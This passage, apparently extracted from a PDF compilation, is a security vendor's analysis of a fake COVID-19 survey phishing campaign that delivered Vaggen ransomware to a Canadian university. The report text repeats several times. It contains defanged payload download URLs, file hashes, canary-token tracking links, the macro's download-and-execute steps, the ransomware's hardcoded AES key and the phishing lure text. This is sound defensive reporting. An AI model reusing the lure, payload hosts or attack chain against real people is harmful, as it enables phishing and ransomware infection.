3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1925 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1926 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1927 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1928 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1929 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1930 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1931 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1932 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1933 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1934 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1935 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1936 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1937 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1938 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1939 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1940 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1941 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1942 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1943 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1944 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1945 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1946 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1947 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1948 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1949 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1950 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1951 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1952 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1953 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1954 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1955 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1956 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1957 of 